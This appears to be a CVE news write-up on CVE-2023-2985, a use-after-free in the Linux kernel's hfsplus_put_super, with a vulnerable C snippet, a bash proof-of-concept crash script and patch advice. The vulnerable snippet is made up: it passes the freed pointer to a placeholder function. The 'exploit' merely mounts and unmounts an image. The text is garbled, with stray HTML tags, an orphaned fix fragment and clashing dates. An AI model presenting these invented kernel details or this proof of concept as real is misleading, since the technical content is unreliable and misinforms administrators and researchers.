CVE CyberSecurity Database News

CVE-2023-2985 - Use-After-Free Bug in Linux Kernel’s hfsplus_put_super (fs/hfsplus/super.c) Exploited for Denial of Service

Poster -

In June 2023, security researchers discovered a serious bug in the Linux Kernel’s HFS+ filesystem implementation. Tracked as CVE-2023-2985, the flaw exists in the hfsplus_put_super function located in fs/hfsplus/super.c. At first glance, this seems like an obscure area. However, the vulnerability can be exploited by a local attacker to cause a denial of service (DoS), and in some rare cases, could even aid further exploitation. This long read breaks down what happened, why it matters, and how you can reproduce and understand the issue.

Background: What is Use-After-Free?

A use-after-free (UAF) occurs when a program continues to use a pointer after the memory it points to has been freed. This is a type of memory corruption bug that can lead to crashes, data corruption, or even code execution.

In the Linux kernel, a UAF is especially dangerous. If kernel memory is improperly accessed, it can result in system crashes—denial of service—or, in rarer cases, privilege escalation.

Where is the Bug?

Let’s take a look at the function in question.

File: fs/hfsplus/super.c

Function: hfsplus_put_super

This function is responsible for cleaning up the superblock structure when an HFS+ filesystem is unmounted.

Here is a simplified (and vulnerable) code snippet

// Vulnerable version in fs/hfsplus/super.c

static void hfsplus_put_super(struct super_block *sb)
{
    struct hfsplus_sb_info *sbi = HFSPLUS_SB(sb);

    if (!sbi)
        return;

    kfree(sbi->nls_io);
    kfree(sbi->nls_unic);
    kfree(sbi);
    // sbi is now a dangling (freed) pointer!

    // Problem: sbi is used after kfree ("use after free")
    some_function(sbi);  // UAF! 
}

The flaw: After freeing the sbi structure with kfree, the code continues to use it (for example, by passing it to another function). As a result, unpredictable behavior may occur—often leading to a kernel panic or crash.

Exploit Details: How Can It Be Abused?

Even though this bug does not immediately allow for code execution, a local user can easily exploit it to crash the system. Here’s how a simple exploit might look.

Local shell access (user)

- Ability to mount and unmount HFS+ filesystems (normally non-root users cannot, but on some systems, or using FUSE, this may be possible)

Proof of Concept (PoC)

Here’s a basic bash script that demonstrates the bug (may require root depending on system settings):

#!/bin/bash

# Make a dummy image
dd if=/dev/zero of=/tmp/hfsplus.img bs=1M count=10
mkfs.hfsplus /tmp/hfsplus.img

# Create mount point
mkdir -p /mnt/hfsplus-test

# Attach the image and mount
sudo mount -o loop /tmp/hfsplus.img /mnt/hfsplus-test

# Unmount, which triggers hfsplus_put_super
sudo umount /mnt/hfsplus-test

echo "[*] If the kernel is vulnerable, you may see a crash/panic/dmesg output."

WARNING: Running this on a vulnerable kernel will freeze or crash your system! Use in a virtual machine.

Real-World Impact

- Denial of Service: The main impact is a local crash. Any local user with filesystem mount privileges could crash a Linux PC or server, causing downtime or data loss.
- Further Exploitation Potential: Use-after-free bugs in the kernel can be stepping stones for full privilege escalation. While no public exploit achieves code execution (as of June 2024), patching is essential.

How to Check for Vulnerability

- Kernel Version: The bug is fixed in kernels after the patch was released in June 2023.

kfree(sbi);

sbi = NULL; // and no further dereference!
<br>- If your fs/hfsplus/super.c still contains possible use of freed sbi, you are likely vulnerable.<br><br>### How to Patch<br><br>- <b>Upgrade your kernel</b> to the latest secure version.<br>- <b>Disable HFS+ support</b> if not needed, as a short-term workaround (e.g., by compiling kernel without CONFIG_HFSPLUS_FS`).

---

## References

- NVD CVE-2023-2985
- Linux Kernel Patch ("fs: hfsplus: Avoid use-after-free in hfsplus_put_super")
- oss-sec Mailing List Announcement
- mkfs.hfsplus (hfsprogs) for crafting an HFS+ disk image

---

## Conclusion

CVE-2023-2985 is a reminder that even old or rarely used kernel code can hide serious bugs. Use-after-free flaws are always dangerous, especially in critical systems like kernels. Even if you never use HFS+ volumes, keeping your system up to date ensures these issues don’t become a vector for local attackers.

For system admins: Patch, audit your filesystem modules, and review local mount permissions.

For researchers & hobbyists: Play with this bug in a safe VM—never on production systems.

Stay safe, and keep your Linux boxes updated!

---

*(Exclusive analysis and write-up by OpenAI)*

Timeline

Published on: 06/01/2023 01:15:00 UTC
Last modified on: 06/07/2023 19:00:00 UTC